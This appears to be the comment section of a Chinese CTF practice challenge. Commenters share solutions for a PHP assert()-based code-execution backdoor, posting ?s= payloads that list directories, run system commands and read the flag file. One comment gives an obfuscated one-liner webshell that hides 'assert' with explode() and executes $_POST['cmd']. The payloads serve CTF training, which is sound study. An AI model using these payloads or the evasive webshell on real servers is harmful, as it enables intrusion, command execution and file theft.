评分(11)
解题动态
星宇Sec 攻破了该题 6小时前
zjw00 攻破了该题 7小时前
XYZ321 攻破了该题 8小时前
wzzzh 攻破了该题 8小时前
huya. 攻破了该题 18小时前
luze 攻破了该题 1天前
lzr19960502 攻破了该题 1天前
一颗栗子君 攻破了该题 1天前
yezia 攻破了该题 1天前
ly9henxihuan 攻破了该题 1天前
zzz122 攻破了该题 1天前
快乐每一天 攻破了该题 2天前
Alivesen 攻破了该题 2天前
ohltc 攻破了该题 2天前
凌源u 攻破了该题 2天前
镜花水月 攻破了该题 3天前
AlfaRivieor 攻破了该题 3天前
错过的恨 攻破了该题 3天前
mahiru 攻破了该题 3天前
评论
hualong 5月前
举报
直接去搜索 http://171.80.2.169:12682/?s=readfile(%22flaga15808abee46a1d5.txt%22);
dlccom 5月前
举报
?s=readfile('/var/www/html/flaga15808abee46a1d5.txt'); 读出 flag
咖啡牛 5月前
举报
这个题可以看到是assert是代码执行漏洞它的作用跟eval一样,我们先调用system('ls');看网页中有什么文件,发现flag文件后,直接用system('cat 文件名');就可以了,评论区我只能说:还得是大佬用这么“高深”的解法
kitniu 5月前
举报
?s=system(dir),然后进入txt文件,flag{********}
攻防小哥 6月前
举报
flag{********}
smartada 7月前
举报
flag{****}
十里故清云 7月前
举报
?s=print_r(scandir('./')) ?s=print_r(file_get_contents(%27flaga15808abee46a1d5.txt%27)) system有可能失败,别用
TS3Rrrr 7月前
举报
大佬们 你们到底是怎么想到这些思路的我感觉在这做的每一道题都是在积累经验因为一个也想不出,只能看看大佬们的解题思路,如果不是只专攻ctf有其他类型的比赛是不是把这些思路更带入实战思考模式会好一点,还是说只要做的多就没有区别
windfalls 4月前
举报
这个提示很重要,免杀一句话木马,assert($_GET['s'])
a6819772 9月前
举报
为什么用?s=system(type flaga15808abee46a1d5.txt)没用啊 萌新求问
zhang 8月前
举报
cat
TIMEtime 10月前
举报
$poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; s=$poc_2($_POST['cmd']);